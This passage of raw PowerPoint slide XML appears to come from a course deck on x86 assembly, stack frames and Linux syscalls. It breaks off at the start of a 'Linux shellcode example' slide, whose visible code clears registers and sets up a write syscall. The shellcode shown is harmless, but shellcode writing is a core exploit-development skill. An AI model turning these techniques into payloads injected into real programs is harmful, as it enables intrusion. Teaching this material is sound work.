          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>smaller than for the equivalent ADD and SUB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>inc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>ecx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dl--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104612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344269"/>
            <a:ext cx="52578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Processor instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="921327"/>
            <a:ext cx="5486400" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ADD - Sum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SUB - Substraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>INC - Increment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DEC – Decrement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CALL – Call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CMP – Compare operands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DIV – Devide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>JMP – Jump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MOV – Move</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>NOP – No operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MUL – Multiply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>POP – Pop data from stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>PUSH – Push data onto stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>RET – Return from procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>XOR – Exclusive OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>LODSD – Load DWORD at address ESI into EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>XCHG – Exchange data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>LEA – Load Effective address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354452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33800" y="383737"/>
            <a:ext cx="16002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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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14154"/>
            <a:ext cx="8001527" cy="2724446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4267200"/>
            <a:ext cx="2438399" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>push 99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>push 88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>push 77</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>call foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>--------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819401" y="5181600"/>
            <a:ext cx="3352799" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>EBP, ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>esp, 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610363" y="4267200"/>
            <a:ext cx="4076437" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Put parameters on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; CALL will put next EIP on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Create a new stackframe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Save EBP and replace it with ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Stack space for local variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66632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33800" y="383737"/>
            <a:ext cx="16002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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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673" y="1184564"/>
            <a:ext cx="4171768" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2000899"/>
            <a:ext cx="3657600" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; 99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; 88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; 77</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Added by CALL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Preserved EBP (start of frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; xx, yy, zz, sum </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Local parameters of function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; ESP (end of frame)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8490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420469"/>
            <a:ext cx="3657600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Linux syscalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Calling syscall.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3921633"/>
            <a:ext cx="4114800" cy="2479167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Execve syscall.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="4114800" cy="2185987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="1447800"/>
            <a:ext cx="3962400" cy="5047536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>is the assembly language instruction that is used to invoke system calls in Linux on x86 (i.e., Intel-compatible) processors. </a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Each process starts out in user mode. When a process makes a system call, it causes the CPU to switch temporarily into kernel mode, which has root (i.e., administrative) privileges, including access to any memory space or other resources on the system. When the kernel has satisfied the process's request, it restores the process to user mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>When a system call is made, the calling of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 0x80 instruction is preceded by the storing in the process register (i.e., a very small amount of high-speed memory built into the processor) of the system call number (i.e., the integer assigned to each system call) for that system call and any arguments (i.e., input data) for it. </a:t>
            </a:r>
            <a:endParaRPr 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420469"/>
            <a:ext cx="3657600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Linux syscalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Linux syscalls.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1752600"/>
            <a:ext cx="6477000" cy="4004362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="6019800"/>
            <a:ext cx="7696200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Syscall – Kernel API (interface between usermode and kernelmode)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420469"/>
            <a:ext cx="5638800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Linux shellcode example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="8458200" cy="5047536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> short ender</a:t>
            </a:r>
          </a:p>
          <a:p>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starter:</a:t>
            </a:r>
          </a:p>
          <a:p>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xor</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eax</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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    ;clean up the registers</a:t>
            </a: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xor</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ebx</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ebx</a:t>
            </a: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xor</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edx</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edx</a:t>
            </a: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xor</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ecx</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ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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mov al, 4       ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        mov </a:t>
            </a:r>
